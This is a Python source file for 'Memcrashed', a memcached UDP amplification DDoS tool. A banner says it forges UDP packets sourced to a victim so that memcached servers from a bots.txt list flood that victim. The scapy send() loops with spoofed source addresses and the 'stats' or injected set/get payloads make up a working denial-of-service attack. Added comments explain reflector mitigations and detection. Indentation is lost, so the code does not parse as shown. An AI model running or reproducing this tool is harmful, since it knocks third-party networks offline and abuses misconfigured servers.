memcrashed.py
#-- coding: utf8 --
#!/usr/bin/python
import sys, os, time, shodan
import logging
logging.getLogger("scapy3k.runtime").setLevel(logging.ERROR) ##removes the ipv6 warning
from pathlib import Path
from scapy.all import * ##please change it to from scapy3k.all import * if giving error
from contextlib import contextmanager
# Wall-clock start time; not referenced again anywhere in the visible listing.
starttime=time.time()
# Disabled helper, left commented out by the author: it would have pointed
# sys.stdout at os.devnull for the duration of a `with` block and restored it
# afterwards.
#@contextmanager
#def suppress_stdout():
# with open(os.devnull, "w") as devnull:
# old_stdout = sys.stdout
# sys.stdout = devnull
# try:
# yield
# finally:
# sys.stdout = old_stdout
# Path object for ./api.txt; the visible code never opens or reads it.
keys = Path("./api.txt")
# Banner and disclaimer text printed by memcrash(). The disclaimer states the
# tool's purpose in the author's own words: UDP requests with a forged source
# address sent to internet-reachable memcached servers.
# Defender note: that only works against memcached instances that answer UDP on
# port 11211 from untrusted networks; disabling the UDP listener (`-U 0`) or
# filtering 11211/udp at the perimeter takes a server out of such lists.
logo = """
███╗ ███╗███████╗███╗ ███╗ ██████╗██████╗ █████╗ ███████╗██╗ ██╗███████╗██████╗
████╗ ████║██╔════╝████╗ ████║██╔════╝██╔══██╗██╔══██╗██╔════╝██║ ██║██╔════╝██╔══██╗
██╔████╔██║█████╗ ██╔████╔██║██║ ██████╔╝███████║███████╗███████║█████╗ ██║ ██║
██║╚██╔╝██║██╔══╝ ██║╚██╔╝██║██║ ██╔══██╗██╔══██║╚════██║██╔══██║██╔══╝ ██║ ██║
██║ ╚═╝ ██║███████╗██║ ╚═╝ ██║╚██████╗██║ ██║██║ ██║███████║██║ ██║███████╗██████╔╝
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝╚═════╝
Author: @037
Edited: Nuzer-Rednek
Version: 4.0.1
####################################### DISCLAIMER ################################################
| Memcrashed 4.0.1 is a tool that allows you to use Shodan.io's amp server list filtered without |
| having a paid account to obtain hundreds of vulnerable memcached servers, provided with already |
| existing bots.txt with ip list. It then allows you to use the same servers to launch widespread |
| distributed denial of service attacks by forging UDP packets sourced to your victim. |
| Default payload includes the memcached "stats" command, 10 bytes to send, but the reply |
| is between 1,500 bytes up to hundreds of kilobytes. Please use this tool responsibly. |
| I am NOT responsible for any damages caused or any crimes committed by using this tool. |
###################################################################################################
"""
# Interactive driver: prints the banner, loads addresses from ./bots.txt,
# prompts for an address, port, repeat count and payload, and then calls scapy
# send() with IP(src=target) and UDP dport=11211 once per loaded address.
# NOTE(review): indentation was lost in this listing, so the nesting of the
# if/else/for blocks below cannot be read off the page and the code does not
# parse as shown.
# Defender note: a forged `src=` only leaves networks that do not enforce
# source-address validation (BCP 38 / uRPF egress filtering), and it only
# reflects off memcached instances that answer UDP on 11211 from untrusted
# networks. Starting memcached with `-U 0`, binding it to loopback or a private
# interface, and dropping 11211/udp at the perimeter remove the reflector.
def memcrash(target):
print(target)
print(logo)
while True:
print('')
try:
myresults = Path("./bots.txt") ##removed api entry and api check
# query and saveme are hard-coded to 'y' and never reassigned in the visible
# code, so every startswith('y') test on them below is always true.
query = 'y'
saveme = 'y'
if myresults.is_file():
ip_arrayn = []
with open('bots.txt') as my_file: ##uses pre-saved bots.txt
for line in my_file:
ip_arrayn.append(line)
# Strip trailing whitespace/newlines from each line read from the file.
ip_array = [s.rstrip() for s in ip_arrayn]
else:
print('')
print('[✘] Error: No bots stored locally, bots.txt file not found!')
print('')
if saveme.startswith('y') or query.startswith('y'):
print('')
# The `target` argument is replaced by whatever the operator types here.
target = input("[▸] Enter target IP address or press enter to use command line target: ")
targetport = input("[▸] Enter target port number (Default 80): ") or "80"
power = int(input("[▸] Enter preferred power (Default 1): ") or "1")
print('')
data = input("[] Enter payload contained inside packet: ") or "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"
# Non-default payload: a set/get pair is built for the key "injected" with an
# expiry of 3600. `dataset` is a tuple used only for the printed preview;
# `setdata` and `getdata` are what the send() calls below carry.
# Detection note for memcached operators: an unexpected "injected" key, or
# set/get/stats requests arriving over UDP from outside the trusted network,
# indicates the instance is being used as a reflector.
if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
dataset = "set injected 0 3600 ", len(data)+1, "\r\n", data, "\r\n get injected\r\n"
setdata = ("\x00\x00\x00\x00\x00\x00\x00\x00set\x00injected\x000\x003600\x00%s\r\n%s\r\n" % (len(data)+1, data))
getdata = ("\x00\x00\x00\x00\x00\x00\x00\x00get\x00injected\r\n")
print("[] Payload transformed: ", dataset)
print('')
##removed show bots list
engage = input('[*] Ready to engage target %s? <Y/n>: ' % target).lower()
if engage.startswith('y'):
if saveme.startswith('y'):
# One pass over the addresses loaded from bots.txt. Every datagram has
# src=target, sport=targetport and dport=11211, so any reply is addressed to
# `target` rather than to the sender.
# Detection note for the receiving side: replies would presumably arrive as
# unsolicited inbound UDP with source port 11211; rate-limiting or dropping
# that traffic upstream is the usual mitigation.
for i in ip_array:
if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
print('[] Sending 2 forged synchronized payloads to: %s' % (i))
# with True:
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
else:
if power>1:
print('[] Sending %d forged UDP packets to: %s' % (power, i))
#with suppress_stdout():
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
elif power==1:
print('[] Sending 1 forged UDP packet to: %s' % i)
send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
# With saveme fixed to 'y' this branch is not reached. It iterates `results`,
# which is not assigned anywhere in the visible code (presumably a leftover
# from the removed Shodan query).
else:
for result in results['matches']:
if (data != "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n"):
print('[] Sending 2 forged synchronized payloads to: %s' % (i))
#with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata), count=1)
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata), count=power)
else:
if power>1:
print('[] Sending %d forged UDP packets to: %s' % (power, result['ip_str']))
#with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
elif power==1:
print('[] Sending 1 forged UDP packet to: %s' % result['ip_str'])
#with suppress_stdout():
send(IP(src=target, dst='%s' % result['ip_str']) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=data), count=power)
print('')
print('[•] Task complete! Exiting Platform. Have a wonderful day.')
# Leaves the `while True` loop after one completed run.
break
else:
print('')
print('[✘] Error: %s not engaged!' % target)
print('[~] Restarting Platform! Please wait.')
print('')
else:
print('')
print('[✘] Error: No bots stored locally')
print('[~] Restarting Platform! Please wait.')
print('')
# Only shodan.APIError is handled; no Shodan call remains in the visible try
# body, so this handler is presumably a leftover from the removed API code.
except shodan.APIError as e:
print('[x] Exiting')
# Thin wrapper: prints `target` and passes it to memcrash().
# `targ` is assigned but not used in the visible code.
def run(target):
targ=target
print(target)
memcrash(target)
# Prompts for an address and passes it to memcrash(), which prints it and then
# replaces it with the answer to its own target prompt.
def main():
host_ip = input("Enter host IP: ")
memcrash(host_ip)
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__":
main()